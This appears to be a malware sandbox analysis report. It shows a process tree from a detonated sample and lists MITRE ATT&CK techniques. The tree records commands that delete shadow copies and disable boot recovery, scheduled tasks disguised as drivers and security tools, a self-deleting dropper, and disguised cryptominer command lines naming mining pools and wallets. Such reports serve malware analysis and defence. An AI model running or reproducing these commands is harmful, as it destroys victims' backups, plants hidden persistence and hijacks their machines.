    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:9460
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:4272
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:5476
- - C:\Windows\SysWOW64\notepad.exe
    notepad.exe
    3⤵
    PID:8816
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:4776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\13F6.exe
C:\Users\Admin\AppData\Local\Temp\13F6.exe
1⤵
PID:9844
- C:\Users\Admin\Documents\Update.exe
  "C:\Users\Admin\Documents\Update.exe"
  2⤵
  PID:10236
- - C:\Users\Admin\AppData\Local\Temp\Red1_.exe
    "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
    3⤵
    PID:7600
- - C:\Users\Admin\AppData\Local\Temp\Clip_.exe
    "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
    3⤵
    PID:9440
- - C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
    3⤵
    PID:8832
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
      4⤵
      PID:8452
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:4044
  - - C:\Users\Admin\AppData\Roaming\VideoDriver.exe
      "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
      4⤵
      PID:10296
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
        5⤵
        
        PID:10272
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:10984
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        5⤵
        
        PID:5564
- - C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
    3⤵
    PID:5292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
      4⤵
      PID:11132
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:8712
  - - C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
      "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
      4⤵
      PID:9516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
        5⤵
        
        PID:9824
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:2564
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:1760
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
        5⤵
        
        PID:5868
- - C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
    "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
    3⤵
    PID:5012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\13F6.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\13F6.exe"
  2⤵
  PID:6264
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 100
    3⤵
    - Runs ping.exe
    PID:6048
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 900
    3⤵
    - Runs ping.exe
    PID:9172

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9284

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6316

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9968

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7176

C:\Windows\SysWOW64\phjyxcbi\xqiecnb.exe
C:\Windows\SysWOW64\phjyxcbi\xqiecnb.exe /d"C:\Users\Admin\AppData\Local\Temp\BB71.exe"
1⤵
PID:3048
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:5796
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:9744

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5636

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8060

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9976

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1500

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8016

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:9512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4904

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6316

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2224

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:10900

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:10932

C:\Users\Admin\AppData\Roaming\ewtuwtt
C:\Users\Admin\AppData\Roaming\ewtuwtt
1⤵
PID:8836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:10420

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8672

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6796

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:10768

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery